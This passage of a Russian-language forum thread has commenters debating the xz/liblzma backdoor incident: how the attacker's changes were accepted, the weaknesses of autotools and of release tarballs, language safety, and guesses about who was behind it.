    А никак! Если есть какая-то возможность их отключить, то их отключают, по просьбе какого-то васяна и это апрувит создатель проекта.

    ps уверен потом такие же клооуны будут бухтеть
    "зачем пихать проверки в компилятор? есть же куча санитайзеров и прочих инструментов, надо просто их использовать и будет вам счастье"

     
     
  • 2.167, Аноним (-), 11:14, 30/03/2024 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 2.177, Аноним (106), 11:23, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Сказать то чего хотел. Если тот же самый китаец захотел бы внедрит бекдор в коде на рсте он бы его внедрил. Точно так же некто бы и слова не сказал.
     
  • 2.370, Аноним (364), 16:58, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Так по просьбе какого-то васяна и unsafe-обертки заапрувят и вся хваленая безопасность псу под хвост.
     

  • 1.155, Аноним (-), 10:51, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    О, история становится еще интереснее!
    Чел поучаствовал во многих проектах.
    Например в libarchive.
    Где он создал ПР в котором заменил safe_fprintf на fprintf.
    https://github.com/libarchive/libarchive/pull/1609/files

    ИЧСХ этот ПР приняли! Вообще без какого-то обсуждения.
    А не спросили "какого?!".
    Но для проекта C 89.6%.. впрочем, я совершенно не удивлен))

    И оно жило спокойно с ноября 2021 года, до сегодняю.
    Код ревертнули девять часов назад.

     
     
  • 2.165, Аноним (48), 11:10, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ну, libarchive кривое, не страшно. Её никто в своём уме не будет использовать. А вот от сабжа зависят примерно все, круче только zlib.
     
     
  • 3.171, Аноним (123), 11:18, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Я использую. Потому что иначе мне придётся свою такую же, но хуже, написать.
     
  • 2.170, Аноним (166), 11:17, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >ИЧСХ этот ПР приняли! Вообще без какого-то обсуждения.

    "самое слабое звено в системе безопасности — это человек" (с) Кевин Митник

     
  • 2.190, Аноним (195), 11:34, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >Но для проекта C 89.6%.. впрочем, я совершенно не удивлен))

    Это же какую логику нужно иметь, чтобы связать прием патча с изменения в коде с языком программирования?

    Типа в проектах на Си патчи не проверяют, а в проектах на Go, Rust каждый патч с лупой проверяет 100500 человек?

     
     
  • 3.198, Аноним (248), 11:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Типа в проектах на Си патчи не проверяют, а в проектах на Go, Rust каждый патч с лупой проверяет 100500 человек?

    Типа если люди пишут на Си, им как правило, глубоко плевать на безопаснось.

     
     
  • 4.371, Аноним (364), 17:02, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Звучит как теория заговора.
     
  • 3.201, Аноним (-), 11:49, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Не знаю как в GO, но в раст все принты по умолчанию safe.
    А чтобы сделать ансейф принт, нужно внезапно писать unsafe и потом еще хорошо постараться.
     
     
  • 4.209, Аноним (106), 12:01, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Думаешь китаец испугался бы слова unsafe и не сделал бы коммит? БезопасТность уровень желтая ленточка.
     
     
  • 5.216, Аноним (-), 12:19, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А это зависит от разных вариантов.
    Например есть либы (в расте) которые помечены #![forbid(unsafe_code)]
    что запрещает использование unsafe.

    Понятно это не защитит от "автор либы сам внес бекдор", но тут чел был не главным мейнтенером.

     
     
  • 6.300, Аноним (292), 15:57, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >Понятно это не защитит от "автор либы сам внес бекдор", но

    Но тебе захотелось попиариться, вот же ж незадача.

     
  • 6.372, Аноним (364), 17:04, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >это не защитит от "автор либы сам внес бекдор"

    На этом обсуждение можно было и закончить.

     
  • 6.379, jsforever (ok), 18:42, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Например есть либы (в расте) которые помечены #![forbid(unsafe_code)] что запрещает использование unsafe.
    > Понятно это не защитит от "автор либы сам внес бекдор", но тут чел был не главным мейнтенером

    Например есль скрипты (в баше) которые просто пускают команды, без каких-либо подстановок, либо с минимальной долей что делает невозможной небезопасные действия/обфускацию/т. п.

    Понятно, это не защитит от "автор либы сам внес бекдор", но тут чел был не главным мейнтенером.

    Не позорься.

     
  • 3.213, Аноним (-), 12:08, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    - Удалённо эксплуатируемая уязвимость в драйвере NVMe-oF/TCP из состава ядра Linux
    opennet.ru/opennews/art.shtml?num=59940

    - Уязвимости в модуле ksmbd ядра Linux, позволяющие удалённо выполнить свой код
    opennet.ru/opennews/art.shtml?num=59189

    - Уязвимость в NTFS-драйвере из состава GRUB2, позволяющая выполнить код
    https://www.opennet.dev/opennews/art.shtml?num=59868

    - Обход шифрования диска в Linux через непрерывное нажатие клавиши Enter
    https://www.opennet.dev/opennews/art.shtml?num=59702

    Как вообще такой код проходил ПР?
    Возможно разработчики на определенных языках действительно забивают на безопасность?

     
     
  • 4.301, Аноним (292), 16:00, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Как вообще такой код проходил ПР?

    Всё просто - в ПР/МР делают придирки к неймингу, стилю кодирования, не сопадающим с таковым у автора, стикерам на макбуке, а на то, чтобы код работал хоть до, хоть после предложений ревьюера, обычно не смотрят.
    На какую-либо безопасность не смотрят тем более.

     
  • 2.234, Oe (?), 12:53, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Любая сторонняя либа это потенциальный источник трояна, соответственно код либы должен исполняться в изолированном контейнере, а входные данные подаваться зашифроваными. И только потом модерация кода либы.
     
  • 2.339, Аноним (339), 23:18, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Эту историю читаешь и плакать хочется.

    Один из коммитов етого псевдокитайца в oss-fuzz:

    ревьювер: LGBT^WLGTM

    (прошло два года, гром грянул, мужик^Wревьювер перекрестился)

    тот же ревьювер: actually, it's no LGTM.

    Ну вот и чо им скажешь, кроме как застрелиться у них на глазах?

     

  • 1.169, Аноним (123), 11:17, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Заметьте изменения были введены после обязательного введения 2FA на GitHub не ... большой текст свёрнут, показать
     
     
  • 2.179, Аноним (48), 11:25, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вполне вероятно, что и петрушка, и вероятно даже не один действовал, но при чём тут авторы? Будто, это впервые происходит. Хоть решение отключить проверки и защиты выглядит подозрительно, но этого недостаточно, чтобы что-либо утверждать.
     
     
  • 3.197, Аноним (123), 11:42, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +4 +/
    А это не мы должны предоставлять железобетонные доказательства, что автор сопров... большой текст свёрнут, показать
     
     
  • 4.202, Аноним (202), 11:50, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Насчёт закрытия — я всегда думал, что liblzma - это часть 7zip. Особенно учитывая то, что автор алгоритма LZMA - это Игорь Павлов. Почему эта либа до сих пор ставится не из первоисточника, не из форка-порта первоисточника p7zip, а из мутного порта не пойми кого — вопрос открытый.

    Что не отменяет необходимость упразднения autotools в 7zip.

     
     
  • 5.206, Аноним (106), 11:59, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Похоже ты не понимаешь сути проблемы в сабже. Проблема что в трояне был баг, который аффектил в валгриде, а не то что троян впринципе был. Если троян был это кого надо троян. И они его ещё раз вставят куда надо и ты его никогда не найдешь за обозримое время. По сути проблема исполнителя.
     
     
  • 6.215, Аноним (215), 12:17, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >И они его ещё раз вставят куда надо и ты его никогда не найдешь за обозримое время. По сути проблема исполнителя.

    Именно, поэтому авторам xz, libarchive и прочим скомпрометированным — никакого доверия.

     
     
  • 7.222, Oe (?), 12:35, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Как вообще в либе для архивации может быть троян? Она принимает входные данные, выдает выходные, больше у нее прав быть не должно, максимум попытаться использовать уязвимость процессора. Чтобы предотвратить встраивание трояна в выходные данные эти самые данные должны подаваться на вход зашифрованными, это же логично, да?
     
     
  • 8.237, Аноним (48), 12:56, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ты не понимаешь, как программы работают То, что ты хочешь, недостижимо практиче... текст свёрнут, показать
     
  • 6.218, Аноним (218), 12:22, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >Похоже ты не понимаешь сути проблемы в сабже. Проблема что в трояне был баг, который аффектил в валгриде, а не то что троян впринципе был

    Это - для бекдорщиков проблема, что обнаружили. Проблемы индейцев шерифа не волнуют. А для нас же проблема, что
    1) были созданы условия для скрытия бэкдора - сопровождающим
    2) бэкдор был внедрён
    3) при участии сопровождающего.

     
     
  • 7.224, Oe (?), 12:39, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    То есть тебя не смущает что были созданы все условия чтобы бэкдор работал? Не удивлюсь если либа архивации еще и в интернет выходить может, давайте еще ей права записи во флешку биоса предоставим, что уж мелочиться.
     
     
  • 8.236, Аноним (246), 12:54, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, не смущает, так как права выдаются не либе, а процессу, а в одном контексте... текст свёрнут, показать
     
  • 2.240, Аноним (248), 13:05, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > после обязательного введения 2FA на GitHub [...] с целью продвижения FIDO2 - бэкдорнутого стандарта, придуманного с целью навязывания продуктов членов Альянса, завязывания аутентификации на них и сбора биометрии

    Подавляющее количество людей использует TOTP для 2FA. Где ты тут учуял продвижение FIDO2?

    > Как я и предупреждал, от сопровождающего-вредителя [...] ничего не поможет

    Ну так 2FA и не для этого нужен. К чему ты его упомянул?

     
     
  • 3.251, Аноним (246), 13:21, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Использование TOTP сделано максимально неудобным, а в случае с FIDO2 вообще разр... большой текст свёрнут, показать
     
     
  • 4.326, Анонми (?), 20:22, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Использование TOTP сделано максимально неудобным

    Скопипастить код - это, по твоему, максимально неудобно?

    > с FIDO2 вообще разрешено обходиттся одним фактором — "аутентификатором"

    Лол. Устройство-аутентификатор и есть второй фактор. Чисто по определению.

     
     
  • 5.343, Аноним (343), 01:05, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    1. Да, неудобно. Можно на JS написать аутентификатор, но лучше свалить из этого б.......о цирка, чем быть клоуном у п.......в.
    2. При "пасскеях" устройство-аутентификатор есть единственный фактор, пароль не нужен, главное чтобы от нужного вендора был.
     

  • 1.186, Аноним (186), 11:29, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Libselinux также поддерживает liblzma и связывается с гораздо большим количеством программ, чем libsystemd.
     
  • 1.229, Аноним (288), 12:48, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Накалякал в Федору: https://pagure.io/fesco/issue/3185

    Посмотрим что из этого выйдет. Думаю, что закроют и скажут, "нет ресурсов/не наше дело/да по фигу".

     
     
  • 2.235, Аноним (-), 12:53, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Смешно если честно, это предложение больше на вброс или троллинг похоже.

    > There must be a website or a central authority

    Сейчас же набегут со словами "а почему мы вообще должны доверять шапке?"
    И начнут делить кому можно доверять, а кому нет.

    > which includes known to be good/safe/verified/vetted open source packages

    Кто их будет верифицировать? Даже у RHEL нет таких ресурсов.

    > along with e.g. SHA256/384/512/whatever hashes of the source tarballs.

    Как это поможет, если из затрояненых сорцов будет собран такой же бинарь?
    Суммы все сойдутся, а толку будет ноль.

    Я бы закрыл такое предложение "А давайте чтобы было хорошо и не было плохо" как notabug

     
     
  • 3.277, Аноним (277), 14:09, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Я бы закрыл такое предложение "А давайте чтобы было хорошо и не было плохо" как notabug

    Более того, "А давайте *вы там кто-нибудь* сделаете, чтобы было хорошо, *а мне неохота даже разбираться* кому и как это предложение направить."

    Да и само предложение нерабочее, т.к. разные дистрибутивы могут иметь разные критерии по включению тех или иных пакетов. А на роль "козлов отпущения" с верифицированным адресом желающих, ясное дело, не найдется.

     

  • 1.238, Аноним (238), 13:00, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    > бэкдор был спрятан в m4-макросах .. инструментарием automake

    Вот он - Linux way!

     
     
  • 2.255, Аноним (255), 13:24, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А во FreeBSD automake не используется? ;)
     
     
  • 3.344, Аноним (344), 01:22, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Там юниксовый make.
     
  • 2.345, Аноним (345), 02:43, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Оглянись, вдруг у тебя что-то торчит.
     

  • 1.253, й (?), 13:23, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Люди, которые считают,что в PID 1 непременно нужно вкрячить библиотеку компрессии (а также картину корзину картонку и маленькую собачонку) - должны быть готовы к таким сюрпризам и не жаловаться.

    Птушо за время пути собака будет расти.

     
  • 1.254, crypt (ok), 13:24, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    атака классная. респект китайцу. жаль, быстро спалили. сижу, жую попкорн:

    $ xz --version
    xz (XZ Utils) 5.4.5
    liblzma 5.4.5
    $ freebsd-version
    13.3-RELEASE


     
  • 1.257, Аноним (84), 13:27, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >В 2021 году Jia Tan передал изменение в проект libarchive

    Microsoft has signaled it will add native support for tar, 7-zip, rar, gz and "many other" archive file formats to Windows - it's used the libarchive open source project
    https://www.theregister.com/2023/05/24/microsoft_rar_support_native_windows/

    >Jia Tan несколько дней назад был включён в число мэйнтейнеров проекта XZ Embedded, используемого в ядре Linux

    Однако, это серьезный провал китайской киберразведки. Столько сил и лет потрачено на внедрение своего человека.

     
     
  • 2.261, Аноним (48), 13:33, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    А почему китайской? Скорее всего околополяки какие-нибудь, как обычно.
     
     
  • 3.267, товарищ майор (?), 13:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Китайский-китайский, не сомневайтесь.
     
  • 3.269, Аноним (84), 13:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >А почему китайской?

    Судя по виртуозной схеме внедрения бекдора в sshd, работали серьезные профи.

     
  • 2.280, mikhailnov (ok), 14:17, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Однако, это серьезный провал китайской киберразведки. Столько сил и лет потрачено на внедрение своего человека.

    До того, как Github заблокировал репозиторий xz, мне почему-то мимолетно показалось, что тексты в коммитах этого "китайца" написаны скорее носителем языка, чем китайцем, но это с большой вероятностью может быть ошибочным впечатлением.
    Зачем заблокировали репозитории? Из ЦРУ поступило указание, чтоб подумать, как замести следы..?

     
     
  • 3.303, Аноним (292), 16:05, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >что тексты в коммитах этого "китайца" написаны скорее носителем языка, чем китайцем

    Вы наводите поклёп на страну, в которой в куче детсадов по прикомандированному к детям европейцу, который их учит английскому.

     
     
  • 4.415, Пользователь чебурнета (?), 12:26, 08/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Может это американец китайского происхождения? Азиато-американец.
     
  • 2.338, Аноним (339), 23:04, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Однако, это серьезный провал китайской киберразведки. Столько сил и лет потрачено на внедрение своего человека.

    Единственно, что свой человек время  от времени лажался и коммитил с таймзоной EET и сопутствующими переводами часов.

    А также чтил христианские праздники типа рождества. А китайские, наоборот, не соблюдал.

    А так вылитый китаец, чо.

     

  • 1.259, Аноним (48), 13:30, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    То, что никто не проверяет соответствие релизных архивов реальным данным в дереве, достаточно удивительно на самом деле. Хотя и не это проблема тут, но изменение моментально бы обнаружилось. А то до воспроизводимых сборок и подписанных блобов додумались, а до воспроизводимых блобов с исходниками нет.
     
     
  • 2.271, Аноним (271), 13:48, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Несоотвествие в порядке вещей для autocrap. Там при подготовке релизного архива всегда куча мусора напихивается. Реально десятки тысяч строк скриптов могут добавиться. Идеальное место, чтобы вот такое спрятать.
     
  • 2.276, Аноним (246), 14:05, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    А зачем проверять, если можно просто git юзать? Но ведь не юзают. Чую, когда так начнут делать, может вылезти уязвимость с коллизиями в SHA-1: все форки в GitHub на самом деле живут в одном репозитории, соответственно интересно, что произойдёт, если форкнуть репозиторий и force push коллизию в свою ветку, по идее подменится в апстриме. Нужно срочно на 256 переходить, а в git так и не реализовали передачу таких репозиториев по сети.
     

  • 1.291, Аноним (84), 15:39, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Проблема зашита в libsystemd ldd lib x86_64-linux-gnu libsystemd so 0 linux... большой текст свёрнут, показать
     
     
  • 2.295, Аноним (293), 15:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Нужно решение на базе линкера, запрещающее динамически линковать 2 либы с конфликтующими именами символов кроме как через LD_PRELOAD. Разумеется, не поможет, ибо сплайсинг никто не отменял, но всё же.
     
     
  • 3.298, Ананоним (?), 15:53, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Нужно использовать простое и доверенное ПО. Но это в идеальном мире, а в реальном делайте 1000 заборов, а потом постоянно с ними "работайте".
     
  • 3.304, Аноним (292), 16:06, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >Нужно решение на базе линкера, запрещающее динамически линковать 2 либы с конфликтующими именами символов кроме как через LD_PRELOAD.

    А как я буду malloc заменять?

     
     
  • 4.310, Аноним (310), 17:03, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    если хочешь менять на уровне линкинга либы - то управление памятью надо вынести в отдельную либу. Но в glibc как всегда помойка. Небольшая проблема.
     
  • 3.315, Аноним (84), 18:33, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >запрещающее динамически линковать 2 либы с конфликтующими именами символов

    Ты думаешь, что когда при сборке sshd с ним линковался libsystemd.so, ликер будет смотреть символы во вторично зависимой liblzma.so.5?

     
     
  • 4.318, Аноним (319), 18:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    динамический линкер, линкующий при загрузке бинарей в память.
     

  • 1.316, Аноним (316), 18:34, 30/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Всегда знал, что баш-портянки, регулярные выражения и всякие прочие нечитаемые недоязыки (типа Makefike) - это зло. Если бы выкинули это легаси родом из 70-х и пререшли на нормальную систему сборки (хоть CMake) - проблемы бы не было.

    Вообще легаси нужно чистить периодически, а то в мусорной куче заводятся крысы и прочие паразиты.

     
     
  • 2.346, Аноним (345), 02:45, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Всегда знал, и не исправил... Может ты специально ничего не зделал?
     
     
  • 3.409, Аноним (409), 15:33, 02/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    пособник
     
  • 2.361, Легивон (?), 10:59, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Что не так с Makefile?
     
     
  • 3.389, Аноним (316), 03:02, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ископаемый язык, который никто сейчас даже трогать не хочет ввиду его ужасного и запутанного синтаксиса, не то что изучать. Зато крякеры обожают всякое подобное легаси, что и используется в примере.
     
  • 2.403, Аноним (-), 12:36, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Если бы выкинули это легаси родом из 70-х и пререшли
    > на нормальную систему сборки (хоть CMake) - проблемы бы не было.

    Ваш CMake также поимели, даже не используя никакие регулярные выражения
    https://www.opennet.dev/opennews/art.shtml?num=60888

     

  • 1.348, Berkut (??), 03:22, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В Tumbleweed сегодня из-за этого весь репозиторий пересобрали. Прилетело обновление на 4500 пакетов. Осталось поменять пароли и жить спокойно.
     
  • 1.355, IdeaFix (ok), 10:07, 31/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Интересно, как оно в ЧПУКС работает...
     
     
  • 2.394, Аноним (394), 07:30, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    чпукс кому-то ещё нужен?
     
     
  • 3.402, IdeaFix (ok), 10:04, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > чпукс кому-то ещё нужен?

    Как сказать... я прикупил очень дешево (ибо первый раз в жизни увидел) b2600, а там только нетбсд плохо работает и 11-й чпукс хорошо... другое дело что чпукс для воркстейшонов закопали еще раньше чем для серверов... а для hp-pa еще-еще раньше.

    Блин, чпукс никому не нужен.

     

  • 1.400, Пряник (?), 09:59, 01/04/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Видимо xz настолько заброшен, что никто однострочник с eval не увидел.
     
  • 1.401, Пряник (?), 10:01, 01/04/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Так вот зачем китайцы стучатся по SSH!
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру